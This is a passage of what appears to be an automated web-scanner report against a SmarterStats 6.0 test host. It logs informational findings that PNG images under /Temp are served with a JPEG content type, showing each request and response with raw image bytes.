.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.14. http://vulnerable.smarterstats.6.0.host:9999/Temp/3022c349e42e4a16915d331a96969eb5.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3022c349e42e4a16915d331a96969eb5.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3022c349e42e4a16915d331a96969eb5.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:27 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 12688
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d..1%IDATx^..i.........\_....vW.]...>@]..A..{....V..{..h..S'A.:@.$DQ..c....B_.1....-.........>.s:_uWOuO.T....z9......Tfg..U........!.. .. .. ..pM.:....H..H..H..H.....I@.$@.$@.$@..    P..O..G.$@.$@.$@..6..    ..    ..    ..    8'@as>A..    ..    ..    ..    P...$@.$@.$@.$.......qx$@.$@.$@.$@ac...    ..    ..    ..s..6......    ..    ..    .....k.......M......_<...........vfi...3.H..H..H....x.......M...Y.....]n}..;..rO........Y.....:.N]._D.....j...b....}_....!    ..    ..    .!p.d.t.dx.....y..p.......#........]^.........yBMI..7...[. ..kV.....>.,... .. ..(...a...T...j.......r.M*c..UU..S..........U....{-a.yH..H..H..@UM.S..*Z|.E1.w..N..z.|.....a.;..    .|.Nw. .gkV.d........\__.......w........A.....s.9..s.{.....P...g....p.T.(l.1..-....L.g.?.=..j...WD............[..?..2$?....9X...5oZ9...............6w1BuA..
.."............w..Z..C..m".......C.{.....!2.....OZ.a..[.....U.....8]....m....fW.NN.......A.....i.e....z...&o[.-.....i....h...Q.p~.0...5o.Q]!:..m=...=......V..>N..EFS.g.V...
.B?....l......l........z..%<^.{....k<=.......:y)l....<..... ?|v.....k.N.g..6..b.."lp.!u... I....%...0~....rah..C._/.6.sb...6.....(..$.../...?.m.9....gKx..)l.....u....~..i..6.I.`.9...`P........a....<....(l...:y+a.V.6eP..$I.!p.. .....6._.....aH.....`N..W.....i... I.....A&?._...J..r.C.5...x.S..c....V.....A.$.B......oA~jt<%....!.M7..6..A[Y'....F....m..v..................7.I.P....u.V...(l...9H..C.p`......l........z..%<^.....'=%zc.5mP..$I.!.p.O.A....F...<.S...C.R.t9@a.q...u..p}$
.6(l.N...r8.....F~...a....<....(l...:y+a......9H..C.b.A&?..O...rah..C._/.6.sb.."\....
..$I0.
....0~....)m{.!...<[...Na..........`.3.B..z......2,.....S.......X'....Xa..+l..$...Xb.....
../...k.0$..Bas0'..[    ..Q..Aas.$    .@.. .../...?.m.9....gKx..)l..OzJ.w..i... I..!..}.... ?5.YC2,.!.M7..6..A[Y'......i..6.t....%65...c....C.5o...z..9........Q..Aas.$    .@.. .../...?.m.9....gKx..)l..OzJT+k.... I..!..}.... ?5:....e.....p
.......W....xi..6.t.....M.a.Xa.....z.....^(l...:yK........ .F.....O~..\d....=....k.-..z....>.)....@.F..6....w..j_.O..z.SD~...a..)l.y.*..6h+.........G....M..6>....).(A. N0...k...=.....Z8u.x%.......`k.......j....M.u..g.@./m.#lo....
[....}i..S.p.dX.C.5.....=-l"V.NlN._.....    ....>..V.......j.%..}...['o%l_....l..GYS.....aW.u...J.9.......7.G.}.ia...-f"r......n.6}_.2...+..[Q......-
..(ly....OcmCa...a....<......6.....[Kd,l....M.iQ..m...e.....a{k.6]P.(l].....l....8.<.Z.yCp..G..6w.sg.,......I.U!.{..a{..iC.[.m.~+...(k...C.....2..-s .....tp......v.........YWM.u.V.v&
.2.9%..o....V...?s.a.M+V.p.dX.C.5......-lKd.....7.M....9Z.M..;..u..p.....|..P.6]P.(l.v.]7.l....8.<.Z.yCp.......'.o.!...!f.o.!.V_.:9u... ]n..,    ....a{s.6]P..8.{<..c....C.e0.^.p.>{....A...1.......u......-udSa._Q..Aa......V.. s.'..C.5o........J....f.y.N.r..MQ.tAa..@.|........VlJ.e0....yd....N.G.h.9....s.g.V.........\tJ^`."l...6m.Sa{c.6]P.(l..V5.l....'....5...p....yuB..........^?...^..6.M.Y...@..Aas0.......a{C.6]P..8....is
.....`.....Z.zVS.*.bUM~_.:N.W..6.......E.~..[.....?_..2(l.6p7c...*......W..T.W*?"`w..j.u....S..b......;..~}...:..9..
.>    .p)eM.Q..8...b...C8[2,.a..W}....59%...Fa...=.$...=....T...+l......(m...Q.......d....`...u..........>:.hK.N...Q%l_....|...Q.tAa..@.....)l8]2,.a..7w.......ks._.w..&.z.......u0.....Q...Q......EYS......f...
0.....s`.i.k..#~O...m=..a...N..._...&
..(l\,.].j..B.~F..d........S...+l...:yE.~#V...O..`.6]P.(... .........'..C.5.....
..y.N^..w}.~ud#l...!(..FaC..9,..g.nO.8...Z.y8E.=P....u.R..E..FaC..9,..g.nO.8...Z.y8E.=P....u....3V...O..@.....FaC..9,..g.nO.8...Z.y8E.=P....u.V...(l..F...U!(..FaC..9,..g.nO.8...Z.y8E.=.*l[kg....a+....H.........W..#..6(lV3..............!.2.Z.y8E.=.(l...Cg..+....+.......O^&..N.r.......V.XaCwn..J.9.......7.G.}.,l.1kV...m.<.a{...WG6.....A...<......vHa.a.a..)l.y.Q..O...+m..yJT7.............z.. s.'..C
.n.G.6...^+...a{[..i#.
.....
[..z.{?...2,.....S.....&.[;.....I&......a...CP......... s.'..C.5o.....Q..8..AE*f.F=.2..u.
..~..:...)eM$......p7.......<V.a......0..b|a..r-.:*...D...r..e....
....(l(A. N0...6.L..l....X.X...$...N^...Xa.F6..o.4.eP..8.{..)l...a....<....F.6~..N    .....t.6eP.|..C...%F..0~....`h....}.0..M.4...
.M...CQ.....}.%!(..6....G.@    2.q.y0...fz|a[.wu.....&....^.....`..8..........M.u..#l/....
[....}i..S.p.dX.C.5........z...8......9    ......bb...........:yE...+l....v}.6]P.(l.v.]7.l....8.<.Z.yCp.....6.....m...5y.f.-....RE[....}_........[..)#.a.c.....q...?...'O.e0.^.p.>{.Q.R.Y......%..(f!~.Nn.....S....I.U!.*...zS.5mH{...o%\JY.v.~.....\&[.e.....6...,l...U7...I...T..s....W..&.g[<..W.Vm.e...+|...M..T.^..M......e_.m.V.P..A.`.....!8z.cDa..Z%JR...\"S..&]<%.0...Y....>Wm.e......S...F......Aa..@.e.k.
.N...`h......p!....|....p.f.mG...D5........>.+Qg.0m.c......._..;L.u..p.!
.6....Da......aW.u...J.9.......7...>.97.*M
Q..2..-..U2..................C+k.........S8.y$?...&.2..+l...1.....s........&#...[-F..Z?"[k..b.&....+l_..K.....c.M...q.Dwd..J.9.......7...>........{......u..........f.c....}>
.2.......2(ly.....=.......M.....k.NqU.....l..6.....u..p....6(l..2..Xb.G~.?iM.e0.^.p.m=...O......`.A....Mn..|<...........#..-G...+l.`...%.sS6P..A.`.....!8v...#..>.A.:c(fC...a{..6..O..9Q.tAa..@...@a.g...`h....}.@as0/..Kak.8
..=.P6P..A.`.....!8z.c.a...n.D.....d.."l...6mdSa...CP..-..}..4...6.=....z..).....Zu..f.s..{.....R.nb;<..z.N.r..YQ.tAa....
..J.9.......7.G.}.Pa[.!>..z.ha...$..W.......O.M'k"y..<.......(l...a....y....Wbn?a`....^........x..K.~4....F.'y5...a;....Aa..i..f...J.9....a.5...pIN?..V.^.z...Lod...!..}L...........O<p"le.Z.
..c.M..T..<#
..(ly...<.....'J.e0.&lS!;.o.1.6..5.    U...u.f..|G.~....T.q...Z=.......BO.&...DaSF>...(l...Q...;e.%...    ......$L.Y+...t..-
[...<'}4..Y.....n.z.A.x...dtI^$.D..DY.F6.v[.5eP..8.#..u[
.N...`(k..X__....:v2<".v!l.qL...T...6|...0..u.VY.P...........FaC.....d....`...5/ ..BcI%-.).!f.....3.{hK^..B..Xa.F>...Fa...-..=./X....t.......F......:Xq..y......
........V.v2
.2....FYS.........P6P..A.`..{.yMa.....G.7.."5.F...W..E.^.eM....S........^....P.p.dX.C.5......+l.+E.n.. .$...*..-G....M..6
.z..l....8.<.Z.yCp..Ga..8.v-.+..@%l.'>.`_..n....:yE.^q.>udSa.J.5eP..8.{..)l...a....<..b..+B..!..{}U..o>.q.
.T..O4h
[Ue......r..IQ.tAa.....e.%...    ..0?a[UIk.~...6$.?#
..t.b.mk..+l.O.......|*lO....
[....w.A....8.....    .>/C.0.......&RP=.....B.:y.../GYS......P).(A. N0...k...w..g..`..S...a{...SG6../?!
..(ly..=...6|v.....k.Nq....%:yDU]Y[......f...........FaC.... s.'..C.5o...}..,.m..OL... S}...fQW.Z'....b.M..T...eM...<...........$.2.Z.y8.%=LO..ZQ..DW]Z.>....]..+OE...^u....U..}.-y.....[..)#.a{\.6]P.(lm.i..).m...N............(...x.A.*..
.\x0w........)V.{v.U...f.....z..['...K..i#.a{l.6]P.(l.v.]7.a.D?.u{2.    ...z..)..aDa........U.C.{...7m.....|.N*d...........z.O`......=.eP.(l].....a.D?.u{2.    ...z..)..ataK.ewa...P.......n............Bv2..a{I..iC.[.m.~+.R.....C.....2..-s ........&....n.c.......:.9%...Di..+l.......r.l....=...s`h....}.0..5..?wZt.[z......i#.a......
..=D..P....=...s`Ha.....&.5....5......h.p......q4[......>.u..p]..M.....Fa......aW.u...J.3Z.'C.p....<....F...V.M...v.5..}..5..J..[.x[..o....
...w.Q.p...3.....4.....6.<.(l..i4.=W..}(....F..t.hk.."\...i#.a;.....
.+l.]w.    e.%...    ...z.....>F....)g..h..l..Fq\....w.N.r..W........>....)l=`.....`h....}.0...d.|T..+...Xa.F>..GEa.......... s.'..C.5o......9.......SQ..Aas.$    .@.. ...OZ.a....<........T.....'....uT..+...(k..F.n.....
........(.(A. N0...k...=.1..M.!:.../2.0)..[...R.6]P..8.{._)lv.@......z..)..a.a[........e2*...a{.'.UG>.6....Q.(l....B.~F..d........S....a..A.>.w..u..#l..+l...Q.....m..B.~F..d........S.......X'....c.M..T.N....Aa.......J.3Z.'C.p....<....F...........o.g..._..:y.......Z%\JY.v.6
.z..a.D?.u{2.    ...z..)..a.a.    b.QY'....>q.:.+l....}.....GuP.(l.1 .........'..C.5.....
..y.N.......P@b"l.A..6
.z(.a.D?.u{2.    ...z..).....`^..W..............D%\.....
..=...P....=...s`h....}.@as0/..[    ....)#..}....$&....Aa.......J.3Z.'C.p....<....(l...:yE...eM.)....x0 1....
..=...P....=...s`h....}.@as0/..........$*.../..M..^..l{.....r8.{fH~...a....<....(l...:ys...........\.j].."..Xb....'......k.N.g..6..b.."....=.......?..D.~^.]*l../..F
.%T....+.@..g...`...].......)q.....G....:N.O..6.s.... s........J.>.o..E.n..Fh#..!.@ik=F,....l.sD.e0l[.*);}a....p....y.....p......q..z..9....E.(...b.M.......3.@.B..."R0.V..v.cD..{{..>CdX..~k.....-V...U..4}.@as0......+a.h.6eX/....(lHL.....K..(".Cm..ng=....W...>_dX.CY......N.Ra;v2<...(f..#U%n..8M_=P...G
a{f.5mX/...{o.......kut.....#...!R....ct........%.2.v^.....)P
...?..:'...d!.....^.........a......\...!R....cT.o6.(..T.a..;.y..&dxJ..........{.B..(^..^...we.....\...!r[.ik=F ..hJ......`...-........]K/Fh...t..+l...5y.1.B..?.G......./..E%l'N.]*l...).~ ...    .1.i..9e.."2,.a......[zLn.1..tZe.s..........'.W..:n..9)[kgf?.vm.A.....-y....=.a{....HL.._...../~.N..2$.#.@ik=..<....|......k.N.g..
..p...p....re#.8t>\.6il.....n....?-V..a..K.o...PL.._....!..K....V.Z......&.|......k.N.g..
.f...F..eN...XU.....e......?.[......./\......B.]..=.{v.H.....z.].....l..G.e0.^.p.>{(S..*....}K.mQ.........ak{..v....{...r..
Y....M...jl.....(lH.!l.}F..o...i#.C..(m..h.C....A.d;t.P.tBX...|.Nw. .gkV........X'....K.n.d|o>}..J.>.........=;mXW.*...@$...-.....!|......k.N.g.e
..\L.g.....\.}.i.N^Y...'w..z!...t.e(&.....E.....`..X.D.z.].....l..G.e0.^.p.>{(R.D.....G.(.Ya.s.......^......n....?9
.6..r...6.H!l...R0|{..".b...Ht.... ......+..6<.r`h....}.P...T4o..-o"f........8..zheM..X._....D%l...:.T...O.j#....+m.H1F........2..r..a?..........b.m.......<t@5...W..'E..F.......HL........9...F
..E..6..?....6J...[.z.0.....S........w........G.6S....:y+a..(l.H.P......)......6R0D/.H1F.y.....6.UJT*......R....6>........'FY.F......q@.....D.]*l...m.....c....cD.wZ..ja..7...H...P:8.....f.x.7....~..)l.....!1.........M.P.>V..H1F..Y....6.U..G.....;8.....f.x.7....>..=..~..a}..._y..P..6..m
....@$R..y|V.......?.......x0h.z|....C...#..(l....... }.......?RG.
.r..z!.._./.@"..........W...*.V&....;8.....f.x.7.............D%\7.Cut.6....B$..:^..D.1.;>.A................<..a=>..{.!P...............S...>.J./..>(R..r.6..W...H.....^........X..F
...B...98.....f.x.7....>...a.6eX.D........a....RaCN..`..xZ...c.~c_.....]..d.H1..
...._.P..    ....!P.<..66
..o..)..}\.5mX.D...o....a..ut.......H...8>$R....o...e.....?.V...x.gmX.!..P.P.~.S.....xx..~.E
a{I<m.......8>$R..M.^q.(}|..y.m.UJ..FA.$
.J.o{
...I!l...?..H.P.0
....}....K...x.V.)..$....c.~.8....M.x4i.b.....v....~ ^....cD.%
.B.w[
...I!l...M...(..........=ut.......H..=..b..o>.y|.l.!. Y.).X[A.v....z.. .$Q.P.~.S.....xx.'..b"lW.]...Z/D.?zZ9....v...j..,..C..7p..u...../p.F.1"......-.........
.6..P..s>~/..p}2
.2...R.L....J.D.1z........Y*%.<...f...2..    ....C.^..~..(lZr...N^...s...#.B..........QG.a{n..j#.....!.b..o..y|.lx.J..........\..8..........z.C...=....X'......M..............mut.6.
...sc....c.~.......Y*%.<...f..{v.P{A......X2...!....
..Y.N^..5
.6.....3...(*....RG.a{V..j#.C.B)mS...Ar...e.y*H
..#...W3.~.N.Y.Q..>)B.Y.o.%.z..b.....9........EaS...@.....D...:...R.L.....M1F.....W....2...C.R^3<........O..v...b..^.....>(l.f.:ye.~t.5mX.....DaC"..==V.....vlu..c.~Q.......je.....z....#..dZ.yC..c..6..b..9.......D%l.....Ra{j.Jm..!...v)...hC..>.Z6._X...z>m+y.......O.X2...!....
..Y.N^..%V..a}......wC1.........e
....m.1"..+}|....._...f....0....v).........k{
....N.J..k.6eX....'......._SG.aC.R.Gc.T..O...D.y~F...6J._-...........ig=.\N+{>e;..i..1F.}P....u..A.QQ..a}......?.....EaSF.a{|.JmT...ut..*.)..9m[..j.@.............|%..K...7..=.Aas0+.....i.sZ...._UG.!B........z|..R,..i...W..S..km.`.\<d=.Y...-z..K.J~..ri.^.,.>f.....o...=N.....=['.......uX.D..I..v"lE.].......>Y.....6.....-R.,a|].........!r....C......c?.m.;/n+6...=rn...t..e.-.D{
.P.xe#.8t>\....N.=.N]..y.......PaK.Pj..W...0........0.>)B.U..~.:..7...*..*%:>..v.g.....j.6R1t.]O.F...9|*.my..G..u..z2\:|$<\....yl....k..)l...T..U...w{.....(..K....j.=..u....E..U..v"lY.]........../..z|.1~.q!(....Jj..rl....:.1VC......J40.].....Ol[%......>
..}.\.Z.M.k...........6.......a...N.g!l..b..h.........a.K...c...V....1t,.......}.y......!\-.....?6V).Q...}P.......Fmk..A..H......f...6...    ...z.....[o..r.........s`....y..BY'....\L(lF.....@..u7m...z.N.G..D...OZ.!...6.......?&=.]t..n:.......C...~...z2.....OZ.!.V...:...:...(l..1...........    ..    .@..x[....
[.)....    ..    ..    .@..V.,.3..    ..    ..    dM.....q.$@.$@.$@.%....0...$@.$@.$@.Y...e=}%..'...........OJ......1....p?Ev...gyx......?...........Xxsh..M.<6...w{
.....v!0'.?9.n<xc..)S.........B.......{b..3......ve..ps%.a.r..]x.......(l.g...@.....Vl2ew6V..J....k.`..6.b..Q0...+k"m..&.3.........<...y........~...o=;..i=
[.t.~7..V(...S...V.*/+.
~..[...`..    ....pT]    ....6.v.E.....UIQ..oH...e..'..}X....~.)l.x..5.-....)kP..}.._.V..q.......3~.A...D.C....-.i..'.P..."...EC.o!.YaS`d.M...d..6ld.....9...tp0]    ..8.@U..i....nGa..k.....TqlV{../..a..y[.........<q.$@.$@.$@......<...$@.$@.$@.y....1O.%    ..    ..    .@..(l.O>?:    ..    ..    .@..(ly..GI.$@.$@.$P0.
[....N.$@.$@.$...
[...Q..    ..    ..    .L..V......    ..    ..    .A....<q.$@.$@.$@......<...$@.$@.$@.y....1O.%    ..    ..    .@..(l.O>?:    ..    ..    .@..(ly..GI.$@.$@.$P0.
[....N.$@.$@.$.....>...U.a.....IEND.B`.

10.15. http://vulnerable.smarterstats.6.0.host:9999/Temp/3568cde247644a1b9ec6e79fbea220fc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/3568cde247644a1b9ec6e79fbea220fc.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/3568cde247644a1b9ec6e79fbea220fc.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7526
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d....IDATx^....4.].....?@...#..Xf.....f.FX26.c6...........%.Yd6.Y..P......|...-.......&..Lu.;......_...........O...Q.L...... .... .@h.;....C....@....H.6.....@......@`.>A\... .... @`...@....@..........!.... ....6z....@......@`.>A\... .... @`...@....@..........!.... ....
